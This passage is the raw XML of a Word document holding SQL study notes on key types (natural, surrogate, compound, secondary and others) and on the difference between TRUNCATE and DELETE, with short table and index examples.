        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extra attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> not necessary for uniqueness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ACF4F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63F84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User table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD1908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Candidate key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA16C6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email → Super key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC9309E"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3173" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="735AFEE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Natural Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0E3A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859E5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that is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>derived from real-world data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCAAC7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4947822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siness meaning (like SSN, email, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57584C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not be ideal for indexing or changing systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718C4CF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2E712E9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Citizen (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471449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sn VARCHAR(20) PRIMARY KEY  -- SSN is a natural key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D7D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DBE4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3174" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D0CD0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Surrogate Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A55AA6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781C9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tificial</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> key created for uniquely identifying a record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EDDCD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2D3F0ED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an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auto-incremented ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6728E7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siness meaning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27490FA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38EB43C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Product (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3494F52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d INT PRIMARY KEY AUTO_INCREMENT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518D9F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50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4125276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65CA3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3175" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="610AE54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Compound Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0BFF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94D697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terchangeably with composite key, it is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>combination of multiple columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to uniquely identify a row.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3BAE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7AB5B3A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as composite key example above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA5DB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3176" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AB2B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1. Artificial Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BFE3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47F1B0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created to replace a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>natural key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when no suitable natural key exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3B7A5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3D002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ame as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>surrogate key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DECFA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simplifying joi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 etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3755F1E2"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47AE8">
          <v:rect id="_x0000_i3177" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D372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2. Secondary Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA9BB0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6787F5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on-primary key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used for searching and querying efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BAF6B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6A98965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es not enforce uniqueness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACC4DB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used in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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACF26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7F570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an index on a column:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDEAD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INDEX idx_emp_name ON Employee(emp_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC12ED3" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="00E74E18">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B8A54A" w14:textId="148AB078" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212"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l SQL Keys Explain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8403"/>
      </w:tblGrid>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="3DA93A75" w14:textId="77777777" w:rsidTr="003F6E3B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41E67590"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02212" w:rsidRPr="00CE4B95" w14:paraId="7A879709" w14:textId="77777777" w:rsidTr="003F6E3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="203464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ly identifies each record. Only one per table. Not NULL &amp; unique.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="72E60515" w14:textId="77777777" w:rsidTr="003F6E3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EBA26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s a relationship between tables. Refers to the primary key in another table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="7DDC7FBD" w14:textId="77777777" w:rsidTr="003F6E3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D5DEE2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lumn values are unique. Allows one NULL. Multiple allowed per table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="04007A5E" w14:textId="77777777" w:rsidTr="003F6E3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F1D68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two or more columns to form a unique identifier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="4F4E876E" w14:textId="77777777" w:rsidTr="003F6E3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21630F5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umn or set of columns that can qualify as a primary key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="01E9955E" w14:textId="77777777" w:rsidTr="003F6E3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12AE648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s not chosen as the primary key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="3431471E" w14:textId="77777777" w:rsidTr="003F6E3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7913F1B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et of columns that can uniquely identify a row (may include extra columns).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="0050AD7F" w14:textId="77777777" w:rsidTr="003F6E3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61820C4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key that has a real-world meaning (like SSN, email, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="778417A5" w14:textId="77777777" w:rsidTr="003F6E3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="321C86D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ystem-generated key (like auto-increment ID) with no business meaning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="0E66E680" w14:textId="77777777" w:rsidTr="003F6E3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="218C0C8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composite key; sometimes used interchangeably. Combination of fields used as a key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="09C8A606" w14:textId="77777777" w:rsidTr="003F6E3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CA5860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made key when no natural key exists; often surrogate key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="1C1D0E05" w14:textId="77777777" w:rsidTr="003F6E3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7195D71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primary keys used for indexing and searching records.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52ADE29D"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3178" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB775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1147"/>
        <w:gridCol w:w="843"/>
        <w:gridCol w:w="1724"/>
        <w:gridCol w:w="1829"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="1449983C" w14:textId="77777777" w:rsidTr="009B7CD6">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="457E9B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ary Identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="63B878C4" w14:textId="77777777" w:rsidTr="009B7CD6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6661E5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69376A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23ADF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792544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4E2D2699" w14:textId="77777777" w:rsidTr="009B7CD6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36FDE7E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68BF62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26F76A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927FD4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161B9CA" w14:textId="77777777" w:rsidTr="009B7CD6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="352E9B3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7A744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ACAA65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B5B874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9FFB598" w14:textId="77777777" w:rsidTr="009B7CD6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D212B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8E6FBD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058CAE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96C47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0FB5ADC" w14:textId="77777777" w:rsidTr="009B7CD6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01E655A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CA4F3C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F29F33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476536F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nless chosen)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w14:paraId="211965A9" w14:textId="77777777" w:rsidTr="009B7CD6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D9605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14751B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815F68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5D9E686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9BA5577" w14:textId="77777777" w:rsidTr="009B7CD6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="665DB71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1CA6B0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D79E8E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8E9BB10"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A0F5978" w14:textId="77777777" w:rsidTr="009B7CD6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C6D8B6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D984FC9"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739AF61"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B0A028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5744AAF" w14:textId="77777777" w:rsidTr="009B7CD6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79E8306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43E86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E3897B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C21BD9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21DBD05" w14:textId="77777777" w:rsidTr="009B7CD6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3962182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1A36C5E"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58134C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38D1C274"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022AFFEF" w14:textId="77777777" w:rsidTr="009B7CD6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29E963B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ED4548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2BCF273"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5AE1367"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7CC66950" w14:textId="77777777" w:rsidTr="009B7CD6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46A919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DD8C11C"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F7519DF"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A6E83E2" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00E74E18" w:rsidP="009B7CD6">
            <w:pPr>
              <w:jc w:val="cente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62C317C6" w14:textId="77777777" w:rsid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3179" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0B729D" w14:textId="32C44734" w:rsidR="000938AB" w:rsidRPr="00CE4B95" w:rsidRDefault="000938AB" w:rsidP="000938AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="748" w:name="_Toc197867962"/>
      <w:r w:rsidRPr="000938AB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Truncate and Delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="748"/>
    </w:p>
    <w:p w14:paraId="062D3ECC" w14:textId="5890D2CC" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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TRUNCATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CECF56" w14:textId="63538BC4" w:rsidR="00F815A9" w:rsidRPr="005615E8" w:rsidRDefault="00F815A9" w:rsidP="005615E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005615E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Removes all rows from a table instantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F4C4B2"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not be rolled back (in most RDBMS, unless inside a transaction in some).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112AD22F"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No WHERE clause allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CE0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sets identity/auto-increment columns (in some RDBMS like SQL Server).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263BEE9C"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Faster and less resource-intensive than DELETE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643DA83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log individual row deletions (minimal logging).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6A519E"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24BC925C">
          <v:rect id="_x0000_i3180" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C9F0D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lastRenderedPageBreak/>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00F815A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2A3FA7"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moves rows one at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D8BC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be rolled back if within a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCB8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use WHERE clause to delete specific rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5363E5"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reset identity/auto-increment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C31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Slower for large datasets due to row-by-row logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B238D"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7147A4B7">
          <v:rect id="_x0000_i3181" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="160FA04E"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2181"/>
        <w:gridCol w:w="2784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="1AE1BB50" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7085A02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eature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="515D235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DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D21F5DB"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TRUNCATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="5C4F22CE" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60DB9D2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moves all rows</w:t>
